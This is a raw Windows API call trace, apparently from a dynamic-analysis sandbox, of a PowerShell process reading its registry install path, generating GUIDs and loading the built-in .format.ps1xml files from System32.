	[0785.453] ReadFile (in: hFile=0x328, lpBuffer=0x2d2fc38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d2fc38*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.453] ReadFile (in: hFile=0x328, lpBuffer=0x2d2fc38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d2fc38*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.454] ReadFile (in: hFile=0x328, lpBuffer=0x2d2fc38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d2fc38*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.454] ReadFile (in: hFile=0x328, lpBuffer=0x2d2fc38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d2fc38*, lpNumberOfBytesRead=0x16d3d8*=0xbce, lpOverlapped=0x0) returned 1
	[0785.454] ReadFile (in: hFile=0x328, lpBuffer=0x2d2f36e, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d2f36e*, lpNumberOfBytesRead=0x16d3d8*=0x0, lpOverlapped=0x0) returned 1
	[0785.454] ReadFile (in: hFile=0x328, lpBuffer=0x2d2fc38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d2fc38*, lpNumberOfBytesRead=0x16d3d8*=0x0, lpOverlapped=0x0) returned 1
	[0785.455] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d468 | out: phkResult=0x16d468*=0x328) returned 0x0
	[0785.455] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d3ec, lpData=0x0, lpcbData=0x16d3e8*=0x0 | out: lpType=0x16d3ec*=0x1, lpData=0x0, lpcbData=0x16d3e8*=0x56) returned 0x0
	[0785.455] CoTaskMemAlloc (cb=0x5a) returned 0x1b737290
	[0785.455] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d3bc, lpData=0x1b737290, lpcbData=0x16d3b8*=0x56 | out: lpType=0x16d3bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d3b8*=0x56) returned 0x0
	[0785.455] CoTaskMemFree (pv=0x1b737290) 
	[0785.455] RegCloseKey (hKey=0x328) returned 0x0
	[0785.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0785.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0785.457] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x34abb2d7, Data2=0xa04, Data3=0x4c44, Data4=([0]=0x94, [1]=0xc4, [2]=0xc2, [3]=0xac, [4]=0x62, [5]=0x49, [6]=0xd1, [7]=0xd6))) returned 0x0
	[0785.457] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0xc09b2e83, Data2=0x88fe, Data3=0x4af7, Data4=([0]=0x99, [1]=0xf8, [2]=0x62, [3]=0xcc, [4]=0x99, [5]=0xdc, [6]=0x88, [7]=0x51))) returned 0x0
	[0785.457] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x8c2d1815, Data2=0x3648, Data3=0x4872, Data4=([0]=0x97, [1]=0xd0, [2]=0x9d, [3]=0x39, [4]=0x12, [5]=0x2f, [6]=0x21, [7]=0x86))) returned 0x0
	[0785.457] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x6a8e3112, Data2=0x18a3, Data3=0x40a4, Data4=([0]=0x85, [1]=0x88, [2]=0xb4, [3]=0xe9, [4]=0x5b, [5]=0xdb, [6]=0x83, [7]=0x8e))) returned 0x0
	[0785.457] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x97ac3453, Data2=0x37d6, Data3=0x42e5, Data4=([0]=0xa1, [1]=0x85, [2]=0x49, [3]=0x5b, [4]=0x98, [5]=0x2b, [6]=0x67, [7]=0x85))) returned 0x0
	[0785.457] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x51c8644, Data2=0xf7d1, Data3=0x4dad, Data4=([0]=0x83, [1]=0x1d, [2]=0x4c, [3]=0x9c, [4]=0x33, [5]=0x82, [6]=0x74, [7]=0x6d))) returned 0x0
	[0785.458] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x991e968c, Data2=0x6dfd, Data3=0x4479, Data4=([0]=0x9d, [1]=0xfa, [2]=0xb, [3]=0xbe, [4]=0xcc, [5]=0xe9, [6]=0x8f, [7]=0x2e))) returned 0x0
	[0785.458] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x7554ce84, Data2=0x50a5, Data3=0x4c6c, Data4=([0]=0x87, [1]=0xad, [2]=0x3, [3]=0xd, [4]=0x83, [5]=0xb1, [6]=0x47, [7]=0xe4))) returned 0x0
	[0785.458] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0xafa022f8, Data2=0x7007, Data3=0x4f5e, Data4=([0]=0xbe, [1]=0x1b, [2]=0x96, [3]=0xd5, [4]=0x52, [5]=0xec, [6]=0x23, [7]=0xdf))) returned 0x0
	[0785.458] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x321524d, Data2=0xfd03, Data3=0x41c7, Data4=([0]=0xa6, [1]=0x6a, [2]=0xbe, [3]=0x2c, [4]=0x54, [5]=0xc1, [6]=0x7f, [7]=0x54))) returned 0x0
	[0785.458] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x3a9e5e49, Data2=0xe7bd, Data3=0x4427, Data4=([0]=0x8c, [1]=0xec, [2]=0x95, [3]=0x1a, [4]=0x20, [5]=0x97, [6]=0x7f, [7]=0x46))) returned 0x0
	[0785.458] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x7a7fdfa7, Data2=0x859, Data3=0x4aaf, Data4=([0]=0x92, [1]=0x5, [2]=0x93, [3]=0x97, [4]=0x2a, [5]=0x11, [6]=0x50, [7]=0x6))) returned 0x0
	[0785.459] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0xf8d88d8f, Data2=0x6ce9, Data3=0x4eb6, Data4=([0]=0xb5, [1]=0xc5, [2]=0xea, [3]=0xe5, [4]=0x96, [5]=0xb7, [6]=0xe1, [7]=0x8b))) returned 0x0
	[0785.459] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0xce39c1ba, Data2=0x8bc5, Data3=0x42e6, Data4=([0]=0x9c, [1]=0xbc, [2]=0xa6, [3]=0x36, [4]=0x5f, [5]=0xd9, [6]=0xd0, [7]=0x84))) returned 0x0
	[0785.459] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0xba95cf8e, Data2=0x7f38, Data3=0x4ea9, Data4=([0]=0xb1, [1]=0x13, [2]=0xe1, [3]=0x57, [4]=0x21, [5]=0xdd, [6]=0x19, [7]=0x2f))) returned 0x0
	[0785.459] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x925f08af, Data2=0x8ac0, Data3=0x4877, Data4=([0]=0x9a, [1]=0xae, [2]=0x83, [3]=0x87, [4]=0xed, [5]=0x13, [6]=0xa7, [7]=0xe2))) returned 0x0
	[0785.459] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x783a2a9, Data2=0xd9df, Data3=0x4cf6, Data4=([0]=0xbc, [1]=0x85, [2]=0x8d, [3]=0x75, [4]=0x80, [5]=0x55, [6]=0xe, [7]=0x23))) returned 0x0
	[0785.460] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x39029796, Data2=0x2577, Data3=0x44f1, Data4=([0]=0x93, [1]=0x25, [2]=0xb7, [3]=0xdf, [4]=0x9b, [5]=0x2d, [6]=0x2b, [7]=0x9d))) returned 0x0
	[0785.460] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0xee32dca5, Data2=0x1a46, Data3=0x4206, Data4=([0]=0xae, [1]=0x71, [2]=0x0, [3]=0xce, [4]=0x7, [5]=0xd6, [6]=0x5e, [7]=0xb5))) returned 0x0
	[0785.460] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x662a15d, Data2=0xc97, Data3=0x4c6f, Data4=([0]=0xbb, [1]=0x9f, [2]=0x9d, [3]=0x41, [4]=0xcf, [5]=0xd2, [6]=0xd4, [7]=0xda))) returned 0x0
	[0785.460] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x3a25d9a3, Data2=0xa973, Data3=0x4b59, Data4=([0]=0xba, [1]=0x6e, [2]=0x3d, [3]=0x7b, [4]=0x20, [5]=0x10, [6]=0x4c, [7]=0x2b))) returned 0x0
	[0785.460] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x8ef57823, Data2=0xbcdb, Data3=0x4267, Data4=([0]=0x91, [1]=0x35, [2]=0x9f, [3]=0xb8, [4]=0xcd, [5]=0x14, [6]=0xc7, [7]=0xc6))) returned 0x0
	[0785.460] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0xd71c1b23, Data2=0x87b9, Data3=0x44ec, Data4=([0]=0xba, [1]=0xde, [2]=0xde, [3]=0x34, [4]=0xf0, [5]=0xcd, [6]=0x38, [7]=0x40))) returned 0x0
	[0785.460] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0xc628cd59, Data2=0xf706, Data3=0x4452, Data4=([0]=0x9f, [1]=0xee, [2]=0x82, [3]=0x75, [4]=0x59, [5]=0x8, [6]=0x33, [7]=0xb7))) returned 0x0
	[0785.461] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x565d6b06, Data2=0xf405, Data3=0x4673, Data4=([0]=0xbd, [1]=0x1a, [2]=0xa4, [3]=0x0, [4]=0xa8, [5]=0xa, [6]=0x19, [7]=0x71))) returned 0x0
	[0785.461] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0xabe0505a, Data2=0x6b4f, Data3=0x4143, Data4=([0]=0x9e, [1]=0x53, [2]=0x20, [3]=0x50, [4]=0x2d, [5]=0x49, [6]=0x5f, [7]=0xe1))) returned 0x0
	[0785.461] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x7a489212, Data2=0x904c, Data3=0x4148, Data4=([0]=0xa4, [1]=0x7c, [2]=0xb9, [3]=0x3e, [4]=0x6f, [5]=0xdd, [6]=0x8f, [7]=0x64))) returned 0x0
	[0785.464] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x94880d58, Data2=0x40d4, Data3=0x40ca, Data4=([0]=0x87, [1]=0x79, [2]=0xd5, [3]=0xa2, [4]=0xde, [5]=0xad, [6]=0xd5, [7]=0x37))) returned 0x0
	[0785.464] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x83536426, Data2=0xdde3, Data3=0x4a04, Data4=([0]=0x91, [1]=0x3b, [2]=0x6a, [3]=0x7f, [4]=0xfc, [5]=0x8b, [6]=0x34, [7]=0xb))) returned 0x0
	[0785.465] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x9ed2baf9, Data2=0x957, Data3=0x4ed2, Data4=([0]=0x88, [1]=0x67, [2]=0xcd, [3]=0xdd, [4]=0x8d, [5]=0x9a, [6]=0x20, [7]=0x29))) returned 0x0
	[0785.465] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x86bdff0, Data2=0xaf80, Data3=0x4c11, Data4=([0]=0x84, [1]=0xad, [2]=0xfe, [3]=0x13, [4]=0xb7, [5]=0x75, [6]=0xe7, [7]=0xf7))) returned 0x0
	[0785.465] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x9b23c31b, Data2=0x86ca, Data3=0x4f8d, Data4=([0]=0x86, [1]=0x34, [2]=0x7e, [3]=0xb9, [4]=0x46, [5]=0x40, [6]=0x19, [7]=0x71))) returned 0x0
	[0785.465] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x96dff52e, Data2=0xc8f8, Data3=0x4c12, Data4=([0]=0x87, [1]=0x1, [2]=0xbf, [3]=0x35, [4]=0xb7, [5]=0x67, [6]=0x79, [7]=0xd9))) returned 0x0
	[0785.465] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x8c293773, Data2=0xc175, Data3=0x4418, Data4=([0]=0xac, [1]=0x5b, [2]=0xa9, [3]=0x95, [4]=0x2e, [5]=0x78, [6]=0xc0, [7]=0xfd))) returned 0x0
	[0785.465] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x4e81bc23, Data2=0x24c7, Data3=0x4ee1, Data4=([0]=0x9c, [1]=0x3d, [2]=0xe6, [3]=0xb4, [4]=0x70, [5]=0xd7, [6]=0x23, [7]=0x8e))) returned 0x0
	[0785.465] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x541a83ec, Data2=0x6d86, Data3=0x4301, Data4=([0]=0x83, [1]=0x12, [2]=0xe3, [3]=0xd5, [4]=0x73, [5]=0x82, [6]=0xba, [7]=0x7f))) returned 0x0
	[0785.473] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0xc49573a3, Data2=0x9412, Data3=0x42d4, Data4=([0]=0xad, [1]=0x60, [2]=0x71, [3]=0x96, [4]=0x5d, [5]=0x4d, [6]=0x0, [7]=0x98))) returned 0x0
	[0785.474] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328
	[0785.474] GetFileType (hFile=0x328) returned 0x1
	[0785.474] SetErrorMode (uMode=0x1) returned 0x1
	[0785.474] GetFileType (hFile=0x328) returned 0x1
	[0785.474] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5fd8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5fd8*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.474] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5fd8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5fd8*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.475] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5fd8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5fd8*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.475] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5fd8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5fd8*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.475] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5fd8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5fd8*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.475] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5fd8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5fd8*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.476] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5fd8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5fd8*, lpNumberOfBytesRead=0x16d3d8*=0x119, lpOverlapped=0x0) returned 1
	[0785.476] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5fd8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5fd8*, lpNumberOfBytesRead=0x16d3d8*=0x0, lpOverlapped=0x0) returned 1
	[0785.476] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d468 | out: phkResult=0x16d468*=0x328) returned 0x0
	[0785.476] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d3ec, lpData=0x0, lpcbData=0x16d3e8*=0x0 | out: lpType=0x16d3ec*=0x1, lpData=0x0, lpcbData=0x16d3e8*=0x56) returned 0x0
	[0785.476] CoTaskMemAlloc (cb=0x5a) returned 0x1b737290
	[0785.476] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d3bc, lpData=0x1b737290, lpcbData=0x16d3b8*=0x56 | out: lpType=0x16d3bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d3b8*=0x56) returned 0x0
	[0785.476] CoTaskMemFree (pv=0x1b737290) 
	[0785.476] RegCloseKey (hKey=0x328) returned 0x0
	[0785.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0785.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0785.477] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x398f4a60, Data2=0x5610, Data3=0x40b8, Data4=([0]=0xba, [1]=0x18, [2]=0xbe, [3]=0x3, [4]=0xe2, [5]=0x9f, [6]=0x33, [7]=0x70))) returned 0x0
	[0785.478] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x533ecf9b, Data2=0x318, Data3=0x42a0, Data4=([0]=0xa2, [1]=0x94, [2]=0x2e, [3]=0xcd, [4]=0x69, [5]=0xdb, [6]=0xf0, [7]=0x32))) returned 0x0
	[0785.478] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0xf9114799, Data2=0xa691, Data3=0x4230, Data4=([0]=0x85, [1]=0x1f, [2]=0xaf, [3]=0xd, [4]=0x80, [5]=0x48, [6]=0xec, [7]=0x75))) returned 0x0
	[0785.478] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x6a627d25, Data2=0xd97a, Data3=0x4436, Data4=([0]=0x96, [1]=0x69, [2]=0x7f, [3]=0xc5, [4]=0x8d, [5]=0x96, [6]=0xf5, [7]=0xb5))) returned 0x0
	[0785.478] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328
	[0785.479] GetFileType (hFile=0x328) returned 0x1
	[0785.479] SetErrorMode (uMode=0x1) returned 0x1
	[0785.479] GetFileType (hFile=0x328) returned 0x1
	[0785.479] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.479] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.479] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.479] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.480] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.480] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.480] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.480] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.482] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.482] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.482] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.483] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.483] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.483] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.484] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.484] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.486] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.487] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.487] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.487] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.488] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.488] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.488] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.489] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.489] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.489] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.490] ReadFile (in: hFile=0x328, lpBuffer=0x2d12178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d12178*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
